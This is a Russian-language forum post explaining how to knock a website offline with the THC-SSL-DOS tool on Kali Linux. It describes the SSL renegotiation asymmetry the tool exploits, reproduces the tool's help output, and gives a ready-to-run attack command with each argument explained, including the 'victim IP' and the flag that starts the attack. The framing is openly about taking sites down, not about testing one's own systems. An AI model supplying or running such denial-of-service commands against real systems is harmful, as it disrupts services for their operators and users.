Перейти к содержимому
AnzuS-GOD

SSL DoS на Kali Linux

Recommended Posts

Всем привет! Расскажу вам, как устроить DoS атаку на сайт и положить его с помощью THC-SSL-DOS


THC-SSL-DOS - это инструмент для проверки производительности и безопасности протокола SSL. Установка безопасного SSL-соединения требует в 15 раз больше вычислительной мощности на сервере, чем на клиенте. THC-SSL-DOS использует это асимметричное свойство, перегружая сервер и отключая его от Интернета. Эта проблема затрагивает все реализации SSL сегодня. Поставщики знают об этой проблеме с 2003 года, и эта тема широко обсуждается. Эта атака также использует функцию безопасного повторного согласования SSL для запуска тысяч повторных переговоров через одно TCP-соединение.

 

Рассказывать об установке этой программы я не буду, т.к. она и так есть в популярных ОС для пентеста, таких как Kali Linux, например.

Чтобы запустить этот скрипт, достаточно набрать в терминале "thc-ssl-dos":

root@AtomMushroom-PC:~# thc-ssl-dos 
     ______________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/
            http://www.thc.org

          Twitter @hackerschoice

Greetingz: the french underground

./thc-ssl-dos [options] <ip> <port>
  -h      help
  -l <n>  Limit parallel connections [default: 400]

Синтаксис программы невероятно простой:

-h --- Выводит список комманд

-l --- Лимит параллельных соединений (по умолчанию лимит 400, но ограничений не имеет)

 

Пример использования:

thc-ssl-dos -l 500 127.0.0.1 443 --accept

thc-ssl-dos --- Собственно, сама прога

-l 500 --- 500 параллельных соединений (можете изменить значение на своё)

127.0.0.1 --- IP жертвы

443 --- Порт, на который направлена атака

--accept --- Обязаельная вещь, чтобы начать атаку

 

Ну на этом наверное всё. Надеюсь, кому-нибудь эта тема пригодилась):smayl-banan-animatsionnaya-kartinka-0005:

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

×